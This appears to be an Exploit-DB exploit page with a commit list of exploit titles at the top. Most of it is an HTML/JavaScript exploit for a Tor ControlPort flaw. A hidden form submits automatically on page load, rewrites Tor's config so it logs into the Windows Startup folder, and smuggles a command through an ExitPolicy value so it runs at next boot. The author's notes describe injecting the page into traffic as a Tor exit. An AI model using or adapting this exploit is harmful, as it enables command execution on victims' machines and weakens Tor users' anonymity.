880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
76 lines
No EOL
2.5 KiB
HTML
76 lines
No EOL
2.5 KiB
HTML
source: https://www.securityfocus.com/bid/25188/info
|
|
|
|
Tor is prone to an unauthorized-access vulnerability due to a design error when handling multiple connections to the ControlPort.
|
|
|
|
An attacker can exploit this issue to reconfigure Tor and significantly weaken the anonymity provided by the software.
|
|
|
|
Tor 0.1.2.15 is confirmed vulnerable; previous versions may also be affected.
|
|
|
|
<!--
|
|
|
|
Tor < 0.1.2.16 with ControlPort enabled ( not default )
|
|
Exploit for Tor ControlPort "torrc" Rewrite Vulnerability
|
|
http://secunia.com/advisories/26301
|
|
|
|
Rewrites the torrc to log to a different location: C:\Documents and
|
|
Settings\All Users\Start Menu\Programs\Startup\t.bat
|
|
Also enables debug logging, and an erroneous ExitPolicy looking
|
|
something like this: reject*:1337\'&' calc.exe this will output:
|
|
[debug] parse_addr_policy(): Adding new entry 'reject*:1337'& calc.exe
|
|
to the debug log -> t.bat which will run calc.exe on next boot.
|
|
|
|
This is not very silent though, t.bat will contain something like 45
|
|
rows of crap which the user will see in about 1 sec, drop me a mail if
|
|
you have a better way.
|
|
|
|
Either have a TOR user visit this HTML or inject it into her traffic
|
|
when you're a TOR exit.
|
|
If you inject, just replace </HEAD> with everything in <HEAD> + </HEAD>
|
|
( that's why I tried to fit everything inside <HEAD />), and fix
|
|
Content-Length
|
|
|
|
// elgCrew _AT_ safe-mail.net
|
|
-->
|
|
|
|
<html>
|
|
<head>
|
|
<script language="javascript">
|
|
|
|
window.onload = function()
|
|
{
|
|
|
|
cmd = 'cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 >
|
|
NUL & del t.bat > NUL & exit';
|
|
inject = '\r\nAUTHENTICATE\r\nSETCONF Log=\"debug-debug file
|
|
C:\\\\Documents and Settings\\\\All Users\\\\Start
|
|
Menu\\\\Programs\\\\Startup\\\\t.bat\"\r\nSAVECONF\r\nSIGNAL
|
|
RELOAD\r\nSETCONF ExitPolicy=\"reject*:1337\\\'&' + cmd +
|
|
'&\"\r\nSETCONF Log=\"info file c:\\\\tor.txt\"\r\nSAVECONF\r\nSIGNAL
|
|
RELOAD\r\n';
|
|
|
|
form51.area51.value = inject;
|
|
document.form51.submit();
|
|
}
|
|
</script>
|
|
|
|
<form target="hiddenframe" name="form51"
|
|
action="http://localhost.mil.se:9051" method=POST
|
|
enctype="multipart/form-data">
|
|
<input type=hidden name=area51>
|
|
</form>
|
|
<iframe width=0 height=0 frameborder=0 name="hiddenframe"></iframe>
|
|
</head>
|
|
|
|
<body>
|
|
<pre>
|
|
----
|
|
| y0! |
|
|
----
|
|
\ \_\_ _/_/
|
|
\ (oo)\_______
|
|
|_|\ )*
|
|
||----w |
|
|
|| ||
|
|
</pre>
|
|
</body>
|
|
</html> |